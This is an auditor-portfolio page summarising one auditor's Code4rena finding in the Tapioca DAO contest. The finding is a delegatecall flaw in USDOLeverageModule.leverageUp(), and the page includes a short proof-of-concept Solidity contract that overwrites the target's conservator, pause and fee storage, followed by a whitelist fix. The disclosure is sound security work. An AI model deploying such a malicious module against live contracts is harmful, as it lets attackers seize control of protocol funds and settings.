Back to ACai's contests

Tapioca DAO - ACai's results

The first ever Omnichain money market, powered by LayerZero.

General Information

Platform: Code4rena

Start Date: 05/07/2023

Pot Size: $390,000 USDC

Total HM: 136

Participants: 132

Period: about 1 month

Judge: LSDan

Total Solo HM: 56

Id: 261

League: ETH

Tapioca DAO

Findings Distribution

Researcher Performance

Rank: 100/132

Findings: 1

Award: $56.17

🌟 Selected for report: 0

🚀 Solo Findings: 0

External Links

Code4rena Contest PageGithub Contest RepositoryGithub Findings RepositoryTapioca DAO

Findings Information

🌟 Selected for report: Ack

Also found by: 0x73696d616f, 0xrugpull_detector, ACai, BPZ, Breeje, CrypticShepherd, Kaysoft, carrotsmuggler, cergyk, kodyvim, ladboy233, offside0011

Labels

bug
3 (High Risk)
satisfactory
duplicate-1083

Awards

56.1709 USDC - $56.17

External Links

Link to GitHub issue

Lines of code

https://github.com/Tapioca-DAO/tapioca-bar-audit/blob/master/contracts/usd0/modules/USDOLeverageModule.sol#L133-L188 https://github.com/Tapioca-DAO/tapioca-bar-audit/blob/master/contracts/usd0/BaseUSDOStorage.sol#L22-L35

Vulnerability details

Impact

The USDOLeverageModule.leverageUp() function does not limit the address module input parameter. Attacker could input a malicious module address to modify the gobal variable of USDOLeverageModule through USDOLeverageModule.leverageUp() function. The affected variables are listed below.

    /// @notice returns the Conservator address
    address public conservator;
    /// @notice addresses allowed to mint USDO
    /// @dev chainId>address>status
    mapping(uint256 => mapping(address => bool)) public allowedMinter;
    /// @notice addresses allowed to burn USDO
    /// @dev chainId>address>status
    mapping(uint256 => mapping(address => bool)) public allowedBurner;
    /// @notice returns the pause state of the contract
    bool public paused;

    /// @notice returns the flash mint fee
    uint256 public flashMintFee;
    /// @notice returns the maximum amount of USDO that can be minted through the EIP-3156 flow
    uint256 public maxFlashMint;

Proof of Concept

Attacker input the address of attack contract as module parameter. Then USDOLeverageModule contract would use this malicious attack.leverageUpInternal() function to set its gobal variable.

contract attack is OFTV2 {
    /// @notice the YieldBox address.
    IYieldBoxBase public immutable yieldBox;

    /// @notice returns the Conservator address
    address public conservator;
    /// @notice addresses allowed to mint USDO
    /// @dev chainId>address>status
    mapping(uint256 => mapping(address => bool)) public allowedMinter;
    /// @notice addresses allowed to burn USDO
    /// @dev chainId>address>status
    mapping(uint256 => mapping(address => bool)) public allowedBurner;
    /// @notice returns the pause state of the contract
    bool public paused;

    /// @notice returns the flash mint fee
    uint256 public flashMintFee;
    /// @notice returns the maximum amount of USDO that can be minted through the EIP-3156 flow
    uint256 public maxFlashMint;

    function leverageUpInternal(
	uint256 amount,
        IUSDOBase.ILeverageSwapData memory swapData,
        IUSDOBase.ILeverageExternalContractsData memory externalData,
        IUSDOBase.ILeverageLZData memory lzData,
        address leverageFor) external{
			conservator = address(0); // or any address
			paused = !paused;	// true or false
			flashMintFee = 0	// or any uint256
			maxFlashMint = 0	// or any uint256
		}
}

Tools Used

Suggest to limit the module address in the white list.

Assessed type

call/delegatecall

#0 - c4-pre-sort

2023-08-07T08:45:20Z

minhquanym marked the issue as duplicate of #146

#1 - c4-judge

2023-09-13T10:25:14Z

dmvt marked the issue as satisfactory

AuditHub

A portfolio for auditors, a security profile for protocols, a hub for web3 security.

Built bymalatrax © 2024

Auditors

Browse

Contests

Browse

Get in touch

ContactTwitter